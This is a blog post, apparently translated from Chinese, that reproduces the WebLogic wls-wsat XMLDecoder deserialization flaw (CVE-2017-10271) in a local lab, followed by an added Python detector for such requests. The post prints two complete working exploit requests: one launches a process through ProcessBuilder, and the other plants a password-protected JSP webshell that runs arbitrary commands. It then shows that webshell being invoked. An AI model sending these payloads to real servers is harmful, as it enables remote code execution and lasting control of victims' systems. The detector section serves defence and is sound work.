WebLogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
阿新 • Published: 2018-11-15
I had reproduced this once before, but the data was lost afterwards, so I had to go through it again.
I could not find a way to install it from the command line on Linux, so I simply installed it on Windows instead.
Download 12.2.1.2.0:
On Windows it has to be run as administrator, otherwise the following error appears:
Run as administrator:
Finally, start the admin server:
Check the listening network ports:
Then the exploit did not succeed.
https://www.exploit-db.com/exploits/43458/
It might be because of Java 8, but switching Java versions is rather difficult.
I finally found where to change the Java home: in user_projects\domains\base_domain\bin\setDomainEnv.cmd
But when running WebLogic it then complained that Java versions below 8 are not supported.
Then I looked at the request in Burp, changed it to a Windows payload, and still got 404 Not Found. Has Oracle already removed the affected component from this version?
Download 10.3.6.0:
https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar
The installation looks roughly like this:
This time the endpoint can finally be reached:
/wls-wsat/CoordinatorPortType
PoC:
https://www.exploit-db.com/exploits/43458/
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 539

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="1" >
            <void index="0">
              <string>calc</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Popping the calculator:
Writing a webshell (https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271):
Request:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 920
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<% if("cqq".equals(request.getParameter("password"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
} %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
It can then be reached with an HTTP request:
http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=cqq&command=tasklist
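As an added example from the defender's side (not code from the original post or from the linked repository), a small Python detector: it parses a raw HTTP request and, for POSTs to /wls-wsat/, reports the classes instantiated and the methods invoked by any XMLDecoder <java> document carried in the work:WorkContext SOAP header, which is the shape shared by the calc PoC and the webshell request above. The sample requests are constructed; production code should parse with defusedxml rather than the standard ElementTree.

```python
import xml.etree.ElementTree as ET  # added example; use defusedxml.ElementTree in production

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
VULN_PATH_PREFIX = "/wls-wsat/"  # servlet path of the affected component (from the post)

def split_request(raw):
    """Split a raw HTTP request (LF line endings, constructed samples) into method, path, body."""
    head, _, body = raw.partition("\n\n")
    method, path = head.split("\n", 1)[0].split(" ")[:2]
    return method, path, body

def inspect_workcontext(body):
    """Return gadget details if an XMLDecoder <java> document sits in work:WorkContext, else None."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return None
    classes, methods = [], []
    for ctx in header.iter(f"{{{WORKAREA_NS}}}WorkContext"):
        for java in ctx.iter("java"):  # un-namespaced <java>; may be nested as in the webshell request
            classes += [o.get("class") for o in java.iter("object") if o.get("class")]
            methods += [v.get("method") for v in java.iter("void") if v.get("method")]
    if not classes and not methods:
        return None
    return {"classes": sorted(set(classes)), "methods": sorted(set(methods))}

def classify(raw):
    """Return a finding dict for a suspicious wls-wsat POST, or None for anything else."""
    method, path, body = split_request(raw)
    if method != "POST" or not path.startswith(VULN_PATH_PREFIX):
        return None
    return inspect_workcontext(body)

# Constructed sample: the post's calc PoC, reduced to the headers the detector needs.
CALC_REQ = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: 127.0.0.1:7001\n\n"
    f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header>'
    f'<work:WorkContext xmlns:work="{WORKAREA_NS}"><java><object class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0"><string>calc</string></void>'
    '</array><void method="start"/></object></java></work:WorkContext>'
    '</soapenv:Header><soapenv:Body/></soapenv:Envelope>')
# Constructed benign request to the same endpoint: empty header, so no XMLDecoder document.
BENIGN_REQ = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: 127.0.0.1:7001\n\n"
    f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header/><soapenv:Body/></soapenv:Envelope>')

if __name__ == "__main__":
    print(classify(CALC_REQ), classify(BENIGN_REQ))  # finding dict for the PoC, None for benign
```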